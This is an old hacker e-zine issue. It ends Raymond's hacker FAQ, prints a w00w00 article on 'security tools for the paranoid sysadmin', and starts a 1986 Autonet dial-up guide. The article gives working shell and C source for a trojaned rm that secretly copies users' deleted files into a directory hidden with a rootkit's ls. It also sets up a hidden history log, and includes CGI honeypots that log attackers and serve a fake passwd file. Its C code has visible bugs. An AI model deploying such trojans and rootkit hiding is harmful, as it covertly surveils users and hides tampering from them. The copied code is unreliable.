If you're attracted to hacking because you don't have a life, that's OK too -- at least you won't have trouble concentrating. Maybe you'll get one later.

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not
substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).
Study Zen, and/or take up martial arts. (The mental discipline seems similar in important ways.)
Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.
Develop your appreciation of puns and wordplay.
Learn to write your native language well. (A surprising number of hackers, including all the best ones I know of, are able writers.)

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're
connected with a mix of left- and right-brain skills that seems to be important (hackers need to be able to both reason logically and step outside the apparent logic of
a problem at a moment's notice).

Finally, a few things not to do.

Don't use a silly, grandiose user ID or screen name.
Don't get in flame wars on Usenet (or anywhere else).
Don't call yourself a `cyberpunk', and don't waste your time on anybody who does.
Don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories -- it could take you years to live it down enough to be accepted.

Other Resources

Peter Seebach maintains an excellent Hacker FAQ for managers who don't understand how to deal with hackers.

The Loginataka has some things to say about the proper training and attitude of a Unix hacker.

I have also written A Brief History Of Hackerdom.

I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even
more directly in its sequel Homesteading the Noosphere.

Frequently Asked Questions

Q: Will you teach me how to hack?

Since first publishing this page, I've gotten several requests a week from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do
this; my own hacking projects take up 110% of my time.

Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you
beg to be spoon-fed everything they know.

Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions.

Q: Would you help me to crack a system, or teach me how to crack?

No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this
kind that I get will be ignored or answered with extreme rudeness.

Q: Where can I find some real hackers to talk with?

The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP page at
Sunsite).

(I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached
to things like GIMP and Perl, have IRC channels now.)

Q: What language should I learn first?

HTML, if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is
HTML: The Definitive Guide.

But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people
recommending Perl, and Perl is still more popular than Python, but it's harder to learn.

C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first.

Q: But won't open-source software leave programmers unable to make a living?

This seems unlikely -- so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net
economic gain over not having it written, a programmer will get paid whether or not the program is going to be free after it's done. And, no matter how much "free"
software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages.

Q: How can I get started? Where can I get a free Unix?

Elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to
educate yourself. Start now...

$Date: 1999/03/26 09:18:00 $


Eric S. Raymond <esr@snark.thyrsus.com>


@HWA


SITE.1 Featured site: http://www.w00w00.org/
~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~~~~~ 


This is an excerpt entitled security and monitoring tools for the paranoid
sysadmin and is a good example of some of the quality content that can be
found at this site. there are some good examples here check out the site
for more...

<a href="www.w00w00.org">http://www.w00w00.org/">www.w00w00.org, "w00w00 Security"</a>


Security and Monitoring Tools
-----------------------------
Shok (Matt Conover)
shok@dataforce.net, shok@sekurity.org

What I plan for this to be, is some various utilities that you might think
as of use and what not. This is mainly a few security tips that I like to
use.

First off, edit your /etc/profile, and add the line:
export HISTFILE=/tmp/hist/`whoami`

and then do:
mkdir /tmp/hist;chmud 1777 /tmp/hist

You now want to hide that file, so the users don't see the dir (it can be
seen with set but not too many people check :) and you hide it with the
rootkit's ls.

Another few things I like to do.
I made a trojaned 'rm' that basically calls /bin/rm.bak which is hidden
(via rootkit ls), and it copies the file they are trying to delete to
/tmp/fill (which is also hidden via rootkit ls).
There are two versions of this....I wrote the first one in shell script,
but do to the fact it has to be a+r, I wrote it in C afterwords. Here is
the rm.sh:

#!/bin/sh
# rm trojan, stores files in a temp directory, that is +tw, but go-r
# the directory this writes to should be hidden with a trojaned ls
# (via rootkit)
# this is just an example...USE rm.c ;)

if [ $# > 1 ]
then

case $1 in
-i)
shift
cp -f $* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -i $*
;;

--interactive)
shift
cp -f $* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -i $*
;;


-f)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -f $*
;;

--force)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -f $*
;;


-d)
shift
cp $1/* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -d $*
;;

--directory)
shift
cp $1/* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -d $*
;;


-v)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -v $*
;;

--verbose)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -v $*
;;


-r)
shift
cp -f $1/* /tmp/fill &>/dev/null
doexec /bin/rm.bak -R $*
;;

-R)
shift
cp -f $1/* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -R $*
;;

--recursive)
shift
cp -f $1/* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -R $*
;;


-ri)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -ri $*
;;

-Ri)
shift
cp -f $1/* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -ri $*
;;


-rf)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rf $*
;;

-Rf)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rf $*
;;


-rd)
shift
cp -f $1/* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -rd $*
;;

-Rd)
shift
cp -f $1/* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -rd $*
;;


-Rv)
shift
cp -f $1/* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -rv $*
;;

-rv)
shift
cp -f $1/* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -rv $*
;;


-fv)
shift
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -fv $*
;;


-Rfv)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rfv $*
;;

-rfv)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rfv $*
;;

*)
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak $*
;;
esac

else
IT = $1
cp -f $IT /tmp/fill
/bin/rm.bak $IT

fi

If you do not have the program doexec, write it like this:

#include <stdio.h>
#include <unistd.h>

void main(int argc, char **argv)
{
execl(argv[1], argv[2], argv[3], argv[4], (char *)NULL);
}


Now for rm.c:

/* ------------------------------------------------------ */
/* rm.c -- rm "trojan" by Shok (Matt Conover) */
/* ------------------------------------------------------ */
/* Email: shok@dataforce.net, shok@sekurity.org */


#include <sys/stat.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


void main(int argc, char **argv)
{
int i, c;
int recursive, verbose, force, interactive;

if (argc > 2) {
while((c = getopt (argc, argv, "Rrifv:")) != -1)
switch (c)
{
case 'R':
case 'r':
recursive = 1;
break;
case 'i':
interactive = 1;
break;
case 'f':
force = 1;
break;
case 'v':
verbose = 1;
break;
case '?':
exit(1);
default:
break;
}
} else if (argc == 2) {
setenv("PROGRAM", argv[1], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak", "rm", argv[1], NULL);
unsetenv("PROGRAM");
exit(0);
} else {
exit(0);
}


if ((interactive == 1) && (verbose != 1) && (force != 1) && (recursive != 1)) goto interactive;
if ((force == 1) && (verbose != 1) && (interactive != 1) && (recursive != 1)) goto force;
if ((verbose == 1) && (interactive != 1) && (force != 1) && (recursive != 1)) goto verbose;
if ((recursive == 1) && (verbose != 1) && (force != 1) && (interactive != 1)) goto recursive;

if ((recursive == 1) && (force == 1) && (interactive != 1) && (verbose != 1)) goto rf;
if ((recursive == 1) && (force != 1) && (interactive == 1) && (verbose != 1)) goto ri;
if ((recursive == 1) && (force != 1) && (interactive != 1) && (verbose == 1)) goto rv;
if ((recursive == 1) && (force == 1) && (interactive != 1) && (verbose == 1)) goto rfv;

fprintf(stderr, "Unknown error.\n");
exit(1);

interactive:

for (i = 2; i < argc; i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-i",argv[2],NULL);
}

exit(0);

force:

for (i = 2; i < argc; i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-f",argv[2],NULL);
}

exit(0);

verbose:
for (i = 2; i < argc; i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-v",argv[2],NULL);
}

exit(0);

recursive:
for (i = 2; i < argc; i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-r",argv[2],NULL);
}

exit(0);

rf:
for (i = 2; i < argc; i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rf",argv[2],NULL);
}

exit(0);

ri:
for (i = 2;i < argc; i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-ri",argv[2],NULL);
}

exit(0);

rv:
for (i = 2; i < argc; i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rv",argv[2],NULL);
}

exit(0);

rfv:

for (i = 2; i <argc; i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rfv",argv[2],NULL);
}

exit(0);
}

This program can of course be improved, especially replacing the strcmp's
with getopt() but I could care less....

Now when ever a user deletes something it will first be copied to
/tmp/fill before it's deleted.

Now, even though it's logged to /var/log/httpd/access_log, I'd like to
know right away when someone tries to use the phf or test-cgi
vulnerabilities on me. So I replaced the phf and test-cgi programs in my
/cgi-bin/ with this. The first will get the info on who it is, then it
will send a fake passwd file. This can be improved of course but I don't
care to take the time.

phf.c:

/* w00w00! */
/* phf trojan */
/* -------------------------------------------------------------------- */
/* Just a little utility to log information about who is exploiting us. */
/* Will mail it to root of local host, with the IP address, the web */
/* browser, the query string, etc. It will then return a fake password */
/* below which can be modified. */
/* */
/* Shok (Matt Conover) */
/* shok@dataforce.net, shok@sekurity.org */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <sys/stat.h>
#include <sys/types.h>


/* List of defines */
#define ERROR -1

#define IP "206.71.69.243" /* Set this to your IP address. */

#define ADMIN "root" /* Set this to the user (or address) of the person */
/* to get phf attempts. */

#define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */
#define MAILPROG "/bin/mail" /* This does have to be the 'mail' */
/* program but this is to specify the */
/* path. */

/* This returns a '404 File Not Found' to the client. */
#define PRNSERVERR() printf("Content-type: text/html\n\n"); \
printf("<HTML><HEAD>\n"); \
printf("<TITLE>404 File Not Found</TITLE>\n"); \
printf("</HEAD><BODY>\n"); \
\
printf("<H1>File Not Found</H1>\n"); \
printf("The requested URL was not found on this server.<P>\n"); \
\
printf("</BODY></HTML>\n"); \
\
fflush(stdin), fflush(stdout), fflush(stderr);

/* Free up our structures before exiting. */
#define FREEALL() free(buf), free(cmdarg), free(address);
/* ------------------ */

void main()
{
FILE *tmpfile, *fingerinfo;

int pid;
int fd[2];
register int errors = 0;

char *buf = malloc(4096);
char *cmdarg = malloc(512);
char *address = malloc(256);

char *host = getenv("REMOTE_HOST");
char *addr = getenv("REMOTE_ADDR");
char *browser = getenv("HTTP_USER_AGENT");
char *query_string = getenv("QUERY_STRING");


/* We check each malloc seperately so we can free */
/* any previously malloc()'d buffers. */
if (buf == NULL) {
perror("malloc");
PRNSERVERR();
exit(ERROR);
} else memset(buf, 0, sizeof(buf));

if (cmdarg == NULL) {
perror("malloc");
PRNSERVERR();
free(buf);
exit(ERROR);
} else memset(cmdarg, 0, sizeof(cmdarg));

if (address == NULL) {
perror("malloc");
PRNSERVERR();
free(buf), free(cmdarg);
exit(ERROR);
} else memset(address, 0, sizeof(address));
/* ----------------------------- */


if (pipe(fd) == ERROR) {
perror("pipe");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

bzero(buf, sizeof(buf));

if ((pid = fork()) == ERROR) {

openlog("phf", LOG_PID, LOG_USER);
syslog(LOG_ERR, "Unable to fork().");
closelog();

PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) {
close(fileno(stdout)), close(fileno(stderr)), close(fd[0]);
dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */
dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

sprintf(address, "@%.*s", 256 - 1, host);

/* Log information. */
printf("The following person used phf!!\n\n");
printf("\tHost: %s\n", host);
printf("\tAddress: %s\n", addr);
printf("\tBrowser type: %s\n", browser);
printf("\tQuery String (i.e. command entered): %s\n\n", query_string);

printf("Information collected from fingering host (if any):\n");
printf("---------------------------------------------------\n\n");
fflush(stdout);

if ((strcmp(addr, IP) != 0) && (strcmp(addr, "127.0.0.1") != 0))
execl(FINGERPROG, "finger", address, (char *)NULL);
else
printf("[from the localhost (%s)]\n", IP);

printf(".\n"); /* Terminate 'mail'. */
/* --------------- */

FREEALL();
exit(0);
} else {

close(fileno(stdin)), close(fileno(stderr)), close(fd[1]);
dup2(fd[0], fileno(stdin)); /* Send all input to the pipe's input. */
dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

wait(NULL); /* Wait for child to completely finish before starting. */

/* Setup the subject to send to mail. */
sprintf(cmdarg, "-s \"PHF ATTEMPT FROM %.*s!\"",
sizeof(cmdarg) - 19, host);

/* fork() another child to execute the mail program. */
if ((pid = fork()) == ERROR) {
perror("fork");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) execl(MAILPROG, "mail", cmdarg, ADMIN, (char *)NULL);
}

/* Send a fake password file.. if there is a "cat" and "/etc/passwd" */
/* in the QUERY_STRING. Otherwise report file not found (this can */
/* cause problems if they first send a cat /etc/passwd and then send */
/* an xterm request for example. */

if (strstr(query_string, "cat") && strstr(query_string, "/etc/passwd")) {
printf("Content-type: text/html\n\n");
printf("<HTML><HEAD>\n");
printf("<TITLE>Query Results</TITLE>\n");
printf("<H1>Query Results</H1>\n");
printf("</HEAD><BODY>\n");

printf("<P>\n");
printf("/usr/local/bin/ph -m alias=x \n");
printf("cat /etc/passwd\n");
printf("<PRE>\n");
printf("root:x3DgdbFdn:0:1:Operator:/:/bin/csh\n");
printf("nobody:*:65534:65534::/:\n");
printf("daemon:*:1:1::/:\n");
printf("sys:*:2:2::/:/bin/csh\n");
printf("bin:*:3:3::/bin:\n");
printf("uucp:*:9:9::/var/spool/uucppublic:\n");
printf("news:*:6:6::/var/spool/news:/bin/csh\n");
printf("mail:*:8:8::/:\n");
printf("audit:*:11:11::/usr/sbin/audit:/bin/csh\n");
printf("slip::25:25:SLIP:/tmp:/usr/sbin/sliplogin\n");
printf("sync::1:1::/:/bin/sync\n");
printf("sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag\n");
printf("sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag\n");
printf("ftp:*:10:20:ftp:/home/ftp:/usr/bin/bash\n");
printf("www:*:50:50:World Wide Web:/home/www:/usr/bin/bash\n");
printf("pop:*:60:60:Post Office Protocol:/var/spool/pop:/usr/bin/bash\n");
printf("f33r:A23gAdcYf5:4110:100:f33r me bitch:/home/hph:/usr/local/bin/tcsh\n");
printf("john:Vf84.y4kl/:4120:18:John Preston:/usr/john:/usr/bin/bash\n");
printf("lolop:j7Hf./fdf:8900:100:LoLoP:/home/lolop:/usr/local/bin/tcsh\n");
printf("pcguest::7454:100:Guest Account:/tmp:/usr/bin/sh\n");
printf("pscoot:Em8y0pwT.5umo:8930:100:Pike Scoot:/home/pscoot:/usr/bin/bash\n");
printf("shok:aDrsBsefYr:666:100:Matt Conover:/home/shok:/bin/bash\n");
printf("majordomo:*:405:20:Majordomo server:/dev/null:/bin/startdomo\n");
printf("listserv:*:567:20:Listserv server:/dev/null:/bin/sh\n");
printf("jsmith:Fdd34cDfc:8940:100:Jim Smith:/home/jsmith:/usr/bin/bash\n");
printf("db:*:8970:100:Dieter Beule:/usr/sirius/dieter:/usr/bin/bash\n");
printf("guest:*:8999:110:Guest:/home/guest:/usr/local/bin/tcsh\n");
printf("</PRE>");

printf("</BODY></HTML>\n");
} else {
PRNSERVERR();
FREEALL();
}

FREEALL();
}


test-cgi.c:

/* w00w00! */
/* test-cgi trojan */
/* -------------------------------------------------------------------- */
/* Just a little utility to log information about who is exploiting us. */
/* Will mail it to root of local host, with the IP address, the web */
/* browser, the query string, etc. It will then return a File Not Found */
/* error. */
/* */
/* Shok (Matt Conover) */
/* shok@dataforc.enet, shok@sekurity.org */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <sys/stat.h>
#include <sys/types.h>

/* List of defines */
#define ERROR -1

#define IP "206.71.69.243" /* Set this to your IP address. */

#define ADMIN "root" /* Set this to the user (or address) of the person */
/* to get phf attempts. */

#define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */
#define MAILPROG "/bin/mail" /* This does have to be the 'mail' */
/* program but this is to specify the */
/* path. */

/* This returns a '404 File Not Found' to the client. */
#define PRNSERVERR() printf("Content-type: text/html\n\n"); \
printf("<HTML><HEAD>\n"); \
printf("<TITLE>404 File Not Found</TITLE>\n"); \
printf("</HEAD><BODY>\n"); \
\
printf("<H1>File Not Found</H1>\n"); \
printf("The requested URL was not found on this server.<P>\n"); \
\
printf("</BODY></HTML>\n"); \
\
fflush(stdin), fflush(stdout), fflush(stderr);

/* Free up our structures before exiting. */
#define FREEALL() free(buf), free(cmdarg), free(address);
/* ------------------ */

void main()
{
FILE *tmpfile, *fingerinfo;

int pid;
int fd[2];
register int errors = 0;

char *buf = malloc(4096);
char *cmdarg = malloc(512);
char *address = malloc(256);

char *host = getenv("REMOTE_HOST");
char *addr = getenv("REMOTE_ADDR");
char *browser = getenv("HTTP_USER_AGENT");
char *query_string = getenv("QUERY_STRING");


/* We check each malloc seperately so we can free */
/* any previously malloc()'d buffers. */
if (buf == NULL) {
perror("malloc");
PRNSERVERR();
exit(ERROR);
} else memset(buf, 0, sizeof(buf));

if (cmdarg == NULL) {
perror("malloc");
PRNSERVERR();
free(buf);
exit(ERROR);
} else memset(cmdarg, 0, sizeof(cmdarg));

if (address == NULL) {
perror("malloc");
PRNSERVERR();
free(buf), free(cmdarg);
exit(ERROR);
} else memset(address, 0, sizeof(address));
/* ----------------------------- */


if (pipe(fd) == ERROR) {
perror("pipe");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

bzero(buf, sizeof(buf));

if ((pid = fork()) == ERROR) {

openlog("test-cgi", LOG_PID, LOG_USER);
syslog(LOG_ERR, "Unable to fork().");
closelog();

PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) {
close(fileno(stdout)), close(fileno(stderr)), close(fd[0]);
dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */
dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

sprintf(address, "@%.*s", 256 - 1, host);

/* Log information. */
printf("The following person used test-cgi!\n\n");
printf("\tHost: %s\n", host);
printf("\tAddress: %s\n", addr);
printf("\tBrowser type: %s\n", browser);
printf("\tQuery String (i.e. command entered): %s\n\n", query_string);

printf("Information collected from fingering host (if any):\n");
printf("---------------------------------------------------\n\n");
fflush(stdout);

if ((strcmp(address, IP) != 0) && (strcmp(address, "127.0.0.1") != 0))
execl(FINGERPROG, "finger", address, (char *)NULL);
else
printf("[from the local host (%s)]\n", IP);

printf(".\n"); /* Terminated 'mail'. */
/* --------------- */

FREEALL();
exit(0);
} else {

close(fileno(stdin)), close(fileno(stderr)), close(fd[1]);
dup2(fd[0], fileno(stdin)); /* Send all input to the pipe's input. */
dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

wait(NULL); /* Wait for child to completely finish before starting. */

/* Setup the subject to send to mail. */
sprintf(cmdarg, "-s \"TEST-CGI ATTEMPT FROM %.*s!\"",
sizeof(cmdarg) - 19, host);

/* fork() another child to execute the mail program. */
if ((pid = fork()) == ERROR) {
perror("fork");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) execl(MAILPROG, "mail", cmdarg, ADMIN, (char *)NULL);
}

PRNSERVERR(); /* Just return 404 File Not Found. */
FREEALL();
}


Just as an added bonus here.........
When someone goes to a directory you have .htaccess in, it will send 401,
which is the unauthorized error code (pretty sure it's 401 but not in the
mood to check). Now I editted my srm.conf (usually
/usr/local/etc/httpd/conf/srm.conf), and added this line:

ErrorDocument 401 /cgi-bin/unauthorized.cgi

This is basically like the one above.......except it differs
by the the 'user' part, which lets you know what user it was...this is a
good way to know if there is an unauthorized attempt, and/or what user is
logging into your webpage that is secured......

unauthorized.c:


/* w00w00! */
/* Unauthorized access catcher. */
/* -------------------------------------------------------------------- */
/* Just a little utility to log information about who is unauthorized */
/* to access the web page. Will mail it to root of local host, with the */
/* IP address, the web browser, user, ident, the query string, etc. */
/* */
/* Shok (Matt Conover) */
/* shok@dataforce.net, shok@sekurity.org */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <sys/stat.h>
#include <sys/types.h>

/* List of defines */
#define ERROR -1

#define ADMIN "root" /* Set this to the user (or address) of the person */
/* to get phf attempts. */

#define IP "206.71.69.243" /* Set this to your IP address. */

#define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */
#define MAILPROG "/bin/mail" /* This does have to be the 'mail' */
/* program but this is to specify the */
/* path. */

/* This returns a '404 File Not Found' to the client. */
#define PRNSERVERR() printf("Content-type: text/html\n\n"); \
printf("<HTML><HEAD>\n"); \
printf("<TITLE>404 File Not Found</TITLE>\n"); \
printf("</HEAD><BODY>\n"); \
\
printf("<H1>File Not Found</H1>\n"); \
printf("The requested URL was not found on this server.<P>\n"); \
\
printf("</BODY></HTML>\n"); \
\
fflush(stdin), fflush(stdout), fflush(stderr);

/* Free up our structures before exiting. */
#define FREEALL() free(buf), free(cmdarg), free(address);
/* ------------------ */

void main()
{
FILE *tmpfile, *fingerinfo;

int pid;
int fd[2];
register int errors = 0;

char *buf = malloc(4096);
char *cmdarg = malloc(512);
char *address = malloc(256);

char *host = getenv("REMOTE_HOST");
char *addr = getenv("REMOTE_ADDR");
char *user = getenv("REMOTE_USER");
char *ident = getenv("REMOTE_IDENT");
char *browser = getenv("HTTP_USER_AGENT");
char *query_string = getenv("QUERY_STRING");


/* We check each malloc seperately so we can free */
/* any previously malloc()'d buffers. */
if (buf == NULL) {
perror("malloc");
PRNSERVERR();
exit(ERROR);
} else memset(buf, 0, sizeof(buf));

if (cmdarg == NULL) {
perror("malloc");
PRNSERVERR();
free(buf);
exit(ERROR);
} else memset(cmdarg, 0, sizeof(cmdarg));

if (address == NULL) {
perror("malloc");
PRNSERVERR();
free(buf), free(cmdarg);
exit(ERROR);
} else memset(address, 0, sizeof(address));
/* ----------------------------- */


if (pipe(fd) == ERROR) {
perror("pipe");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

bzero(buf, sizeof(buf));

if ((pid = fork()) == ERROR) {

openlog("httpd: unauthorized.cgi", LOG_PID, LOG_USER);
syslog(LOG_ERR, "Unable to fork().");
closelog();

PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) {
close(fileno(stdout)), close(fileno(stderr)), close(fd[0]);
dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */
dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

sprintf(address, "@%.*s", 256 - 1, host);

/* Log information. */
printf("The following person used phf!!\n\n");
printf("\tHost: %s\n", host);
printf("\tAddress: %s\n", addr);
printf("\tUser: %s\n", user);
printf("\tIdent: %s\n", ident);
printf("\tBrowser type: %s\n", browser);
printf("\tQuery String (i.e. command entered): %s\n\n", query_string);

printf("Information collected from fingering host (if any):\n");
printf("---------------------------------------------------\n\n");
fflush(stdout);

if ((strcmp(addr, IP) != 0) && (strcmp(addr, "127.0.0.1") != 0))
execl(FINGERPROG, "finger", address, (char *)NULL);
else
printf("[from the local host (%s)]\n", IP);

printf(".\n"); /* Terminate 'mail'. */
/* --------------- */

FREEALL();
exit(0);
} else {
close(fileno(stdin)), close(fileno(stderr)), close(fd[1]);
dup2(fd[0], fileno(stdin)); /* Send all input to the pipe's input. */
dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */
wait(NULL); /* Wait for child to completely finish before starting. */

/* Setup the subject to send to mail. */
sprintf(cmdarg, "-s \"UNAUTHORIZED FROM %.*s!\"",
sizeof(cmdarg) - 19, host);

/* fork() another child to execute the mail program. */
if ((pid = fork()) == ERROR) {
perror("fork");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) execl(MAILPROG, "mail", cmdarg, ADMIN, (char *)NULL);
}

printf("Content-type: text/html\n\n");
printf("<HTML><HEAD>\n");
printf("<TITLE>401 Unauthorized Access</TITLE>\n");
printf("</HEAD><BODY>\n");

printf("<H1>Unauthorized Access</H1>\n");
printf("You are unauthorized to access the requested URL.<P>\n");

printf("</BODY></HTML>\n");

FREEALL();
}

<pre>

Here is my hosts.deny too.........in case you wanted to see it ;)
in.telnetd: ALL: /bin/mail -s "%h tried to telnet in" root

#FINGER - Noisy people
#------------
in.fingerd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FINGER ATTEMPT FROM %h" root &

#Security reasons
#---------------
in.ftpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FTP ATTEMPT FROM %h" root &
in.rlogind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RLOGIN ATTEMPT FROM %h" root &
#in.telnetd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "TELNET ATTEMPT FROM %h" root &

# PORTMAP
#-------------
portmap: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "PORTMAP ATTEMPT FROM %h. Using %s" root &

#COMSAT
in.comsat: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "COMSAT ATTEMPT FROM %h" root &

#REXECD
in.rexecd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "REXEC ATTEMPT FROM %h" root &

#RSHD
in.rshd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RSHD ATTEMPT FROM %h" root &

#NNRPD
in.nnrpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "NNRPD ATTEMPT FROM %h" root &

#RPCBIND
rpcbind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RPCBIND ATTEMPT FROM %h. Using %s" root &

#ALL: paranoid


Well.......................................we're winding down to the end.

It has been fun and I don't have much more to say on this article.
Thanks for reading, please feel free to use and distribute this, although
I wish for you to leave my comments and "header" at the tops ... ya know
my "copyright" :)

You can access a few of my things at ftp.w00w00.org or
www.w00w00.org.

Shok (Matt Conover)

Email: shok@dataforce.net, shok@sekurity.org


@HWA


RAW.1 We remember Autonet'86
~~~~~~~~~~~~~~~~~~~~~~

"information wants to be stolen"

- Anonymous


Remember when this was new info? just gleaned from the new uploads
directory of your favourite applecat board pre-ibm and fcp emulex?
well you're probably on the sysadmin side of things now huh? or not
... *g*


===================================================
[ Hacker Supreme's - Hackers Directory Volume # 34 ]
[ Compiled by: Ninja Squirrel and Logan - 5 ]
====================================================

=======================================
[ Hack Copyright: Hacker Supreme 1986 ]
=======================================

[ AUTONET SERIES (Section 1) ]


HOW TO CONNECT TO AUTONET


To establish a connection to Autonet, simply follow the steps
listed below.

1. Dial your local access number and wait for a high-pitched
tone.
NOTE: If you are using a direct-connect terminal, proceed to
Step 3.

2. Switch data set to DATA, or place the telephone receiver fir-
mly in the acoustic coupler, orienting the cord as indicated.

3. Press the RETURN key two times.

4. Autonet will respond with:

Autonet Line xxxxxxxxxx
Command:

5. Type one or more of the connection dialog commands described
on the following pages. The appropriate C or ID command and
corresponding name or number will be provided to you when you
become an Autonet user. The H and T commands may be used in
conjunction with either of these.


SAMPLE SESSION

User entries are shown in square brackets ([ ]).

[ <CR><CR> ]

Autonet Line 3130157042
